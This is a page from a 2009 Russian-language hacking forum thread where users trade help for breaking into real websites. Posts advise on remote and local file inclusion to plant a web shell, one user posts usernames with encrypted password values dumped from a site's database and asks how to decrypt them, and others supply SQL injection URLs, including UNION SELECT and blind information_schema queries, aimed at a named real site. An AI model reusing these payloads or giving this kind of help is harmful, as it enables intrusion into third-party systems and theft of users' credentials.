ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 737 из 1393 « Первая < 237637687727 733 734 735 736 737 738 739 740 741 7477878371237 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7361  
Старый 27.05.2009, 10:09
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
2 Byrger

если в $t диру а в $f имя файла то можно будет проинклюдить существующий файл.
 

  #7362  
Старый 27.05.2009, 11:05
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Цитата:
Сообщение от Iceangel_  
2 Byrger
[RFI]
заливаешь на фтп шел с именем index.php

или шелл с любым именем, но без расширения


[LFI]



2 Shaitan-Devil
можешь посмотреть сайты по реверс айпи на присутствие локального инклуда, и потом инклуднуть записанный в /tmp шелл
Ошибку 404 типо выводит. Проверка существования файла срабатывает.
Оба способа пробовал
 

  #7363  
Старый 27.05.2009, 11:28
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
[0]:webmaster:њyЯu›И§
[1]:administrator:џЊ6г–А¶Ґ2И
[2]:morogoy:¶pР
[3]:dorogoynn:Эxi›лPcх
[4]:anna:NЂ—оB7е
[5]:dorogoy:Уќ=цКі¶э ѓ
вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?
Последний раз редактировалось satana8920; 27.05.2009 в 11:31..
 

  #7364  
Старый 27.05.2009, 11:38
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Цитата:
Сообщение от satana8920  
вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?
попробуй
AES_DECRYPT(AES_ENCRYPT(
хотя, судя по всему ты юзал СИПТ, и там по умолчанию крипт.

еще варианты:
PHP код:
cast(Version()+as+binary)
CONVERT(Version(),binary)
convert(version()+using+latin1)  
convert(version()+using+binary
 

  #7365  
Старый 27.05.2009, 11:40
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
да я и unhex(hex())
не помогает а юзал я да сипт
я уж и руками пробовал

$n@ke
перепробовал все ничего не помогло все так же осталось

еще у кого нито варианты будут?
Последний раз редактировалось satana8920; 27.05.2009 в 11:47..
 

  #7366  
Старый 27.05.2009, 11:53
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от satana8920  
еще у кого нито варианты будут?
Будут

Это скорее всего AES_ENCRYPT НО что-бы расшифровать нужен ключ.

Тоесь пароли попросту зашифрованы

Цитата:
Сообщение от satana8920  
как исправить?
Узнать ключ и расшифровать. А лучше алгоритм, тк. может быть и самопис, визуально не поймёшь
 

  #7367  
Старый 27.05.2009, 12:18
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
jokester
и как вообще этот ключ может выглядеть?
допустим я узнал ключ как это расшифровывать?!
 

  #7368  
Старый 27.05.2009, 12:29
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
http://www.mysql.ru/docs/man/Miscellaneous_functions.html
AES_ENCRYPT
AES_DECRYPT

Посмотри, думаю всё станет понятно
 

  #7369  
Старый 27.05.2009, 20:07
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию
Помогите...
http://www.aftech.ru/about/news/?nid=999999+UNION+SELECT+1,222,3,4,5,6,7,8,9--

Unknown column 'news_datetime' in 'order clause'
Как это обойти?
 

  #7370  
Старый 27.05.2009, 20:38
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))%3E1--
 
 
Страница 737 из 1393 « Первая < 237637687727 733 734 735 736 737 738 739 740 741 7477878371237 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ